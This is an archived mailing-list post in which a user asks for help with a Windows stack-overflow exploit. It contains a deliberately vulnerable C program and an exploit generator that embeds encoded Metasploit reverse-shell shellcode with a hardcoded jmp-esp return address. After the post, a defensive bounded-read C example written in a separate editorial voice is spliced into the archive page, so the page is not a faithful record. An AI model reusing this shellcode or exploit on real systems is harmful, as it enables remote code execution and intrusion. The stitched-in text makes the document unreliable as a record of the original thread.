Vulnerability Development mailing list archives
problem to exploit a stack overflow
From: migalo digalo <l.epsilon () gmail com>
Date: Sun, 22 May 2005 18:20:35 +0000
hi all, first post :-D

ok, ok, I am trying to exploit an example of a stack overflow vulnerable prog:

[code]
#include <stdlib.h>
#include <stdio.h>

int bof()
{
    char buffer[8];
    FILE *badfile = NULL;

    badfile = fopen("badfile", "r");
    if (badfile)
        printf("[+]file open\n");
    fread(buffer, sizeof(char), 1024, badfile); // danger
    return 1;
}

int main(int argc, char **argv)
{
    bof();
    printf("[-] nop nop!\n");
    return 1;
}
[/code]

So if I am right, to exploit this we have the following stack: <NOPS><EBP><EIP><ESP>, EBP==buffer[8], EIP==buffer[12], ESP==buffer[16]. So I code this:

[code]
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <process.h>

#define RET_ADDRESS 0x7C951EED // The new return address for WinXP sp2 french == jump esp

/* win32_reverse - EXITFUNC=seh LHOST=127.0.0.1 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12"
"\xd4\x56\x85\x83\xeb\xfc\xe2\xf4\xee\xbe\xbd\xc8\xfa\x2d\xa9\x7a"
"\xed\xb4\xdd\xe9\x36\xf0\xdd\xc0\x2e\x5f\x2a\x80\x6a\xd5\xb9\x0e"
"\x5d\xcc\xdd\xda\x32\xd5\xbd\xcc\x99\xe0\xdd\x84\xfc\xe5\x96\x1c"
"\xbe\x50\x96\xf1\x15\x15\x9c\x88\x13\x16\xbd\x71\x29\x80\x72\xad"
"\x67\x31\xdd\xda\x36\xd5\xbd\xe3\x99\xd8\x1d\x0e\x4d\xc8\x57\x6e"
"\x11\xf8\xdd\x0c\x7e\xf0\x4a\xe4\xd1\xe5\x8d\xe1\x99\x97\x66\x0e"
"\x52\xd8\xdd\xf5\x0e\x79\xdd\xc5\x1a\x8a\x3e\x0b\x5c\xda\xba\xd5"
"\xed\x02\x30\xd6\x74\xbc\x65\xb7\x7a\xa3\x25\xb7\x4d\x80\xa9\x55"
"\x7a\x1f\xbb\x79\x29\x84\xa9\x53\x4d\x5d\xb3\xe3\x93\x39\x5e\x87"
"\x47\xbe\x54\x7a\xc2\xbc\x8f\x8c\xe7\x79\x01\x7a\xc4\x87\x05\xd6"
"\x41\x87\x15\xd6\x51\x87\xa9\x55\x74\xbc\x45\x0d\x74\x87\xdf\x64"
"\x87\xbc\xf2\x9f\x62\x13\x01\x7a\xc4\xbe\x46\xd4\x47\x2b\x86\xed"
"\xb6\x79\x78\x6c\x45\x2b\x80\xd6\x47\x2b\x86\xed\xf7\x9d\xd0\xcc"
"\x45\x2b\x80\xd5\x46\x80\x03\x7a\xc2\x47\x3e\x62\x6b\x12\x2f\xd2"
"\xed\x02\x03\x7a\xc2\xb2\x3c\xe1\x74\xbc\x35\xe8\x9b\x31\x3c\xd5"
"\x4b\xfd\x9a\x0c\xf5\xbe\x12\x0c\xf0\xe5\x96\x76\xb8\x2a\x14\xa8"
"\xec\x96\x7a\x16\x9f\xae\x6e\x2e\xb9\x7f\x3e\xf7\xec\x67\x40\x7a"
"\x67\x90\xa9\x53\x49\x83\x04\xd4\x43\x85\x3c\x84\x43\x85\x03\xd4"
"\xed\x04\x3e\x28\xcb\xd1\x98\xd6\xed\x02\x3c\x7a\xed\xe3\xa9\x55"
"\x99\x83\xaa\x06\xd6\xb0\xa9\x53\x40\x2b\x86\xed\xe2\x5e\x52\xda"
"\x41\x2b\x80\x7a\xc2\xd4\x56\x85";

int main(int argc, char *argv[])
{
    unsigned long addr;
    char buf[1024];
    FILE *badfile;

    memset(buf, 0x90, 1024);
    *(unsigned long *)&buf[12] = RET_ADDRESS; // EIP = Return Address
    memcpy(&buf[16], shellcode, sizeof(shellcode) - 1);
    badfile = fopen("badfile", "wb");
    fwrite(buf, 1020, 1, badfile);
    fclose(badfile);
    return 0x0;
}
[/code]

But it doesn't work :-( :no, any help? I am stuck with this for 8 hrs. In fact it works till the execution of the shellcode, precisely the decode stage, so we get:

[+] eip <= RET_ADDRESS
[+] jump esp
[+] begin the shellcode execution
[-] access violation, in the decode stage :-x

And what is worse is that I get the same prob with all the shellcode I used (all from metasploit). I am certain there is something I missed, cuz I have already used those shellcodes and they work perfect. Any help?
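The root defect in the target program above is that `bof()` hands `fread` a length of 1024 for an 8-byte stack buffer, so the file contents run over the saved frame pointer and return address. The following is an added example, not the poster's code, showing the defensive counterpart: a reader that lets the destination's own size bound the copy and reports whether input was left over, so an oversized file is detected rather than silently written past the buffer. `BUF_SIZE`, `bounded_read`, `make_input`, `demo_bounded_read` and `demo_input_truncated` are names chosen here; the input is a constructed temporary file of 0x90 bytes created with `tmpfile()`, standing in for the poster's "badfile".

```c
#include <stdio.h>

/* Mirrors the 8-byte stack buffer in the vulnerable bof(). */
#define BUF_SIZE 8

/* Read at most cap bytes from fp into out. The element count passed to
 * fread is the destination capacity, not a constant, so the call can
 * never store past out[cap - 1]. Returns the number of bytes stored. */
size_t bounded_read(FILE *fp, char *out, size_t cap)
{
    if (fp == NULL || out == NULL || cap == 0)
        return 0;
    return fread(out, 1, cap, fp);
}

/* Constructed input: a temporary file holding file_len bytes of 0x90,
 * the same filler the exploit in the post writes. Caller closes it. */
static FILE *make_input(size_t file_len)
{
    size_t i;
    FILE *fp = tmpfile();
    if (fp == NULL)
        return NULL;
    for (i = 0; i < file_len; i++)
        fputc(0x90, fp);
    rewind(fp);
    return fp;
}

/* Read a file_len-byte input into an 8-byte stack buffer with the bounded
 * reader and return how many bytes were stored (never more than 8). */
size_t demo_bounded_read(size_t file_len)
{
    char buffer[BUF_SIZE];
    size_t n;
    FILE *fp = make_input(file_len);
    if (fp == NULL)
        return (size_t)-1;
    n = bounded_read(fp, buffer, sizeof buffer);
    fclose(fp);
    return n;
}

/* The check a caller wants after a bounded read: did the input exceed the
 * buffer? Peeks one byte past what was consumed. Returns 1 if data was
 * left over (oversized input, treat as an error), 0 if it all fit. */
int demo_input_truncated(size_t file_len)
{
    char buffer[BUF_SIZE];
    int truncated;
    FILE *fp = make_input(file_len);
    if (fp == NULL)
        return -1;
    bounded_read(fp, buffer, sizeof buffer);
    truncated = (fgetc(fp) != EOF);
    fclose(fp);
    return truncated;
}

int main(void)
{
    printf("1024-byte input: stored %zu bytes, truncated=%d\n",
           demo_bounded_read(1024), demo_input_truncated(1024));
    printf("   8-byte input: stored %zu bytes, truncated=%d\n",
           demo_bounded_read(8), demo_input_truncated(8));
    return 0;
}
```

With the 1020-byte file the post's generator produces, the bounded reader stores 8 bytes and the leftover check reports truncation, which is the point at which a real program should refuse the input instead of continuing with the partial copy.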
Current thread:
- problem to exploit a stack overflow migalo digalo (May 23)
- Re: problem to exploit a stack overflow Valdis . Kletnieks (May 25)
- <Possible follow-ups>
- problem to exploit a stack overflow migalo digalo (May 25)
- Re: problem to exploit a stack overflow Daniele Milan (May 25)
- Re: problem to exploit a stack overflow 6d79676d61696c6163636f756e74 (May 25)